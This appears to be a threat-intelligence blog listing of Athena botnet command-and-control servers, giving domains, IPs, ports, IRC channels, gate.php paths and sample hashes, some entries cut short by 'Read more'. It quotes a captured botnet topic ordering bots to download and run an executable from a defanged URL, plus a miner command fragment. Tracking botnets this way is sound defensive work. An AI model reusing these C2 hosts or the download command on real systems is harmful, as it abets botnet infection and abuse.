Resolved aba.net.ua to 91.234.34.213 Server: aba.net.ua Port: 81 Gate file: /www55/gate.php Hosting infos: http://whois.domaintools.com/91.234.34.213 Related md5s (Issues with Malwr.com will upload later) Athena: 3fe65356dfd5e7b3f91161bd37e50ba3
burrito.wut.re (Athena irc botnet hosted by ovh.net)
Resolved to burrito.wut.re to 37.59.53.162 Server: burrito.wut.re Port: 6667 Channel: ##a Hosting infos: http://whois.domaintools.com/37.59.53.162 Related md5 (Download samples from Malwr.com) Athena: ac5b059a66ab7005051e0afa598a7757
fewet.com (Athena http botnet hosted by wrzhost.com)
Resolved fewet.com to 91.218.244.229 Server: fewet.com Gate file: /panel/gate.php Hosting infos: http://whois.domaintools.com/91.218.244.229 Related md5s (Search on malwr.com to download samples) Athena: 00238d56ef41e39b7b1ec7870677efa0
212.7.194.240 (Athena IRC Botnet Hosted By Dediserv [dediserv.eu])
This is a guest post witten by mongoose Server: 212.7.194.240 Port: 6667 Channel: #nirjhar Current local users: 47 Max: 472 Current global users: 47 Max: 472 This file was downloaded from this botnet. Whois on host IP: http://whois.domaintools.com/212.7.194.240
5.133.180.103 (Athena irc botnet hosted by bhost.co.uk)
Server: 5.133.180.103 Port: 6667 Current global users 104, max 387 Channel: #razbot #razbot 102 Oper: [n[ARE|U|L|WIN7|x64|2c]loruybe] (rusho@i.hate.microsefrs.com): … [n[ARE|U|L|WIN7|x64|2c]loruybe] #strike #razbot [n[ARE|U|L|WIN7|x64|2c]loruybe] irc.foonet.com :FooNet Server [n[ARE|U|L|WIN7|x64|2c]loruybe] is a Network Administrator [n[ARE|U|L|WIN7|x64|2c]loruybe] is available for help. [n[ARE|U|L|WIN7|x64|2c]loruybe] idle 00:09:52, signon: Tue Sep 03 11:45:07 [n[ARE|U|L|WIN7|x64|2c]loruybe] End of WHOIS list. This is the same authhost as another posted athena botnet. Hosting infos:Read more...
hosting-bros.me (Athena irc botnet hosted by OVH.net)
Resolved hosting-bros.me to 198.245.51.109 Server: hosting-bros.me Port: 2300 Channel: #athena Hosting infos: http://whois.domaintools.com/198.245.51.109 Related md5s (Search on malwr.com to download samples) Athena: c6c1355e7af32c584a4959878bd2640a
irc.tskiller.com (Athena irc botnet hosted by scopehosts.com)
Resolved irc.tskiller.com to 91.109.17.227 Server: irc.tskiller.com Port: 6667 There are 1 users and 207 invisible on 1 servers Channels: #kurdish 5 #ddos 13 asf123 #deus 8 #eser 4 #DyntaiLegion 12 #kebab 6 #stud 6 #Kavin 3 [+sntVCT] #opers 1 #deneme 12 #hack0si 7 #LoL 2 #USA 1 #TizenX 2 #unwrittenlaw 4 #winyle 5 #nirjhar 54 Read more...
allrounders.cc (Athena http botnet hosted by hostkey.com)
Resolved allrounders.cc to 146.0.73.201 Server: allrounders.cc Gate file: /1ds2541svc/gate.php This domain was previously used as a backup domain for a now defunct betabot. I guess the owner is trying all the L33T hackforums bots. Hosting infos: http://whois.domaintools.com/146.0.73.201 Related md5s (Search on malwr.com to see the sample in action. You can’t download it as someone hatesRead more...
thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)
Resolved thebankslife.no-ip.biz to 72.20.28.232 Server: thebankslife.no-ip.biz Port: 6667 Channel Users Topic #sexlyfe 2 [+nt] #Syncrude 78 [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife 35 [+nt] .gtfo Channel: #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...
158.255.2.59 (Athena irc botnet hosted by hostkey.com)
Server: 158.255.2.59 Port: 6667 Current local users 436, max 2038 Channel: #network #network 411 Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd Hosting infos: http://whois.domaintools.com/158.255.2.59